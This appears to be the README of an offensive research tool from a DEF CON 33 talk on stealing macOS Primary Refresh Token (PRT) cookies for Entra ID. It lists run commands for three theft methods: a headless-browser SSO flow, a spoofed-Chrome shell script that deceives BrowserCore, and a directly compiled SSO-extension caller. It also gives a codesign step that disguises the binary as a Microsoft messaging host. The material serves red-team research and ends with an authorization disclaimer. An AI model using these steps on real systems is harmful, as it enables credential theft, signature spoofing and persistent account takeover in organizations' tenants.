The research findings of this project were presented at DEF CON 33.
- Title: Original Sin of SSO: macOS PRT Cookie Theft & Entra ID Persistence via Device Forgery
- Speakers: DEF CON 33 Speakers
- John Jiang (@SeucrityThunder)
- Kazma Ye (@kazma_tw)
- Echo Lee (@iflywithoutwind)
This method uses a headless browser to simulate a Single Sign-On (SSO) process and acquire PRT cookies.
pip3 install -r requirements.txt
python auto.pyThis approach packages a spoofed Chrome application to trigger BrowserCore, deceive it into completing the SSO flow, and obtain PRT cookies.
Replace YOUR_NONCE_HERE with the SSO nonce you intercepted from your browser.
./MacPRThief.sh YOUR_NONCE_HEREIf you don't need or cannot obtain an sso_nonce, you can also run it directly:
./MacPRThief.shThe obtained PRT token will be displayed directly in the terminal.
DirectSSOCall directly calls macOS's SSO Extension to request a PRT cookie.
clang++ -framework Foundation -framework AuthenticationServices -fobjc-arc -o macprt_directcall main.mmTo allow macprt_directcall to be trusted by the system and communicate with WAM (Web Account Manager), it needs to be signed. Here, we're disguising it as a legitimate Microsoft browser messaging host.
codesign --force --deep --sign - --identifier "microsoft.com.browserMessagingHost" ./macprt_directcallAfter signing, you can execute ./macprt_directcall to retrieve the PRT.
This tool is intended solely for academic research and red team exercises.
- β DO NOT use this on machines, tenants, or accounts you do not own or have explicit authorization for.
- β DO NOT use this in production or enterprise environments without authorization.